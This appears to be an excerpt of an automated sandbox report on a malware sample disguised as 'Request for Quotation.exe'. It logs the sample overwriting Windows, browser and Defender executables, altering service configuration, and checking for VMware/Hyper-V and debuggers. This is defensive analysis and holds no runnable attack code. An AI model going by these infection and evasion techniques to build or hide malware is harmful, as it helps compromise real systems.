          Source: MsSense.exe.0.dr Static PE information: section name: .didat
          Source: armsvc.exe.0.dr Static PE information: section name: .didat
          Source: alg.exe.0.dr Static PE information: section name: .didat
          Source: FXSSVC.exe.0.dr Static PE information: section name: .didat
          Source: elevation_service.exe0.0.dr Static PE information: section name: .00cfg
          Source: elevation_service.exe0.0.dr Static PE information: section name: .gxfg
          Source: elevation_service.exe0.0.dr Static PE information: section name: .retplne
          Source: elevation_service.exe0.0.dr Static PE information: section name: _RDATA
          Source: elevation_service.exe0.0.dr Static PE information: section name: malloc_h
          Source: Spectrum.exe.0.dr Static PE information: section name: .didat
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078852Eh; ret 14_2_00787F3A
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788514h; ret 14_2_00787F66
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00787E66h; ret 14_2_00788057
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078817Ah; ret 14_2_0078808B
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 007882E5h; ret 14_2_007880D9
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078826Ah; ret 14_2_0078819E
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078849Ch; ret 14_2_007881E4
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078805Ch; ret 14_2_00788255
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788321h; ret 14_2_007882E0
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00787FBFh; ret 14_2_0078831F
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00787FA8h; ret 14_2_0078834C
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 007884BAh; ret 14_2_007883E2
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788426h; ret 14_2_007884D8
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788075h; ret 14_2_007884FD
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078808Ch; ret 14_2_00788512
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788D45h; ret 14_2_007887D3
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788AB5h; ret 14_2_00788B13
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788784h; ret 14_2_00788CA1
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788DC9h; ret 14_2_00788E1C
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788D14h; ret 14_2_00788E2E
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 00788674h; ret 14_2_00788E4D
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 007888A6h; ret 14_2_00788F76
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00788550 push 0078868Ch; ret 14_2_00788FA4
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00787DF0 push 00787D4Bh; ret 14_2_00787D80
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00787DF0 push 00787DD7h; ret 14_2_00787D9F
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00787DF0 push 00787D5Fh; ret 14_2_00787DB3
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00787DF0 push 007881E6h; ret 14_2_00787E2D
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00787DF0 push 00787FCCh; ret 14_2_007882BB
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00787DF0 push 00788468h; ret 14_2_0078852D
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00766869 push 00766D46h; ret 14_2_0076687A
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_0076704C push 007672FAh; ret 14_2_00767057
          Source: Request for Quotation.exe Static PE information: section name: .reloc entropy: 7.938033508315599
          Source: elevation_service.exe.0.dr Static PE information: section name: .reloc entropy: 7.95288261655599
          Source: AppVClient.exe.0.dr Static PE information: section name: .reloc entropy: 7.943022148528117
          Source: FXSSVC.exe.0.dr Static PE information: section name: .reloc entropy: 7.949290809660346
          Source: elevation_service.exe0.0.dr Static PE information: section name: .reloc entropy: 7.95078360050734
          Source: SensorDataService.exe.0.dr Static PE information: section name: .reloc entropy: 7.942006890028262
          Source: Spectrum.exe.0.dr Static PE information: section name: .reloc entropy: 7.9523341933571015

          Persistence and Installation Behavior

          Source: C:\Windows\System32\AppVClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\398ce0ec3b45a4be.bin
          Source: C:\Users\user\Desktop\Request for Quotation.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\snmptrap.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\Spectrum.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\Locator.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\FXSSVC.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\SysWOW64\perfhost.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\msiexec.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\SensorDataService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\snmptrap.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\Spectrum.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\Locator.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\FXSSVC.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\OpenSSH\ssh-agent.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\SysWOW64\perfhost.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\msiexec.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\SensorDataService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\snmptrap.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\Spectrum.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\Locator.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\FXSSVC.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\OpenSSH\ssh-agent.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\SysWOW64\perfhost.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\msiexec.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\SensorDataService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 14_2_0078CBD0
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\AppVClient.exe Code function: 6_2_00C352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 6_2_00C352A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 10_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_009952A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 11_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00CD52A0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Code function: 13_2_005452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 13_2_005452A0
          Source: C:\Windows\System32\Spectrum.exe Code function: 18_2_007752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 18_2_007752A0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Code function: 20_2_00D252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_00D252A0
          Source: C:\Users\user\Desktop\Request for Quotation.exe API/Special instruction interceptor: Address: ED4434
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_2_035AD1C0 rdtsc 19_2_035AD1C0
          Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 491
          Source: C:\Windows\SysWOW64\perfhost.exe Window / User API: threadDelayed 3989
          Source: C:\Windows\SysWOW64\perfhost.exe Window / User API: threadDelayed 6009
          Source: C:\Users\user\Desktop\Request for Quotation.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_10-5753
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_11-5535
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_13-5663
          Source: C:\Windows\System32\Spectrum.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_18-5484
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_20-5621
          Source: C:\Windows\System32\AppVClient.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_6-5683
          Source: C:\Windows\SysWOW64\perfhost.exe API coverage: 3.8 %
          Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
          Source: C:\Users\user\Desktop\Request for Quotation.exe TID: 7016 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\msdtc.exe TID: 6532 Thread sleep count: 491 > 30
          Source: C:\Windows\System32\msdtc.exe TID: 6532 Thread sleep time: -49100s >= -30000s
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244 Thread sleep count: 3989 > 30
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244 Thread sleep time: -39890000s >= -30000s
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244 Thread sleep count: 6009 > 30
          Source: C:\Windows\SysWOW64\perfhost.exe TID: 7244 Thread sleep time: -60090000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 7396 Thread sleep time: -30000s >= -30000s
          Source: Request for Quotation.exe, 00000000.00000003.1747429848.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1760305746.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1742733827.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746541463.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWAa
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: SensorDataService.exe, 00000010.00000003.1788254386.00000000004D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0fMSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: SensorDataService.exe, 00000010.00000003.1788228338.00000000004BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.dMicrosoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counterd35-4ccf-5552-bfa5\
          Source: Spectrum.exe, 00000012.00000002.2951679671.00000000005E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
          Source: Spectrum.exe, 00000012.00000003.1798128019.0000000000640000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795498403.0000000000641000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795594778.0000000000642000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
          Source: Request for Quotation.exe, 00000000.00000003.1761555251.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1767496014.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1747429848.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1749064184.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1760305746.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: SensorDataService.exe, 00000010.00000003.1788035667.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
          Source: AppVClient.exe, 00000006.00000002.1734357091.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1724790940.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1724669474.00000000005D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000F
          Source: Spectrum.exe, 00000012.00000003.1797930073.0000000000644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen]d
          Source: Request for Quotation.exe, 00000000.00000003.1734763618.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1733339557.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1724729265.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1732896994.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1724313996.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1734043655.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740158447.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1729023921.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1730420404.0000000000E80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: SensorDataService.exe, 00000010.00000003.1788035667.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
          Source: Spectrum.exe, 00000012.00000003.1795498403.0000000000641000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795594778.0000000000642000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter,/d
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterL
          Source: SensorDataService.exe, 00000010.00000003.1788228338.00000000004BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverTM)2 CPU 6600 @ 2.
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4NECVMWar VMware SATA CD00
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: Spectrum.exe, 00000012.00000003.1798032760.000000000064C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
          Source: SensorDataService.exe, 00000010.00000003.1788254386.00000000004D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0}MSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00
          Source: Spectrum.exe, 00000012.00000003.1797930073.0000000000644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Request for Quotation.exe, 00000000.00000003.1705224809.0000000000D04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareworkstation.exe`p
          Source: Spectrum.exe, 00000012.00000003.1795083876.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
          Source: Spectrum.exe, 00000012.00000002.2951679671.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD002
          Source: Spectrum.exe, 00000012.00000003.1797695014.0000000000650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVMware Virtual disk SCSI Disk Device
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_2_035AD1C0 rdtsc 19_2_035AD1C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_2_00417B23 LdrLoadDll, 19_2_00417B23
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_007A1361
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_00761130 mov eax, dword ptr fs:[00000030h] 14_2_00761130
          Source: C:\Windows\SysWOW64\perfhost.exe Code function: 14_2_007A3F3D mov eax, dword ptr fs:[00000030h] 14_2_007A3F3D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_2_03529353 mov eax, dword ptr fs:[00000030h] 19_2_03529353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529353 mov eax, dword ptr fs:[00000030h]19_2_03529353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov ecx, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B035C mov eax, dword ptr fs:[00000030h]19_2_035B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FA352 mov eax, dword ptr fs:[00000030h]19_2_035FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B2349 mov eax, dword ptr fs:[00000030h]19_2_035B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D34C mov eax, dword ptr fs:[00000030h]19_2_0352D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D34C mov eax, dword ptr fs:[00000030h]19_2_0352D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605341 mov eax, dword ptr fs:[00000030h]19_2_03605341
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035D437C mov eax, dword ptr fs:[00000030h]19_2_035D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537370 mov eax, dword ptr fs:[00000030h]19_2_03537370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537370 mov eax, dword ptr fs:[00000030h]19_2_03537370
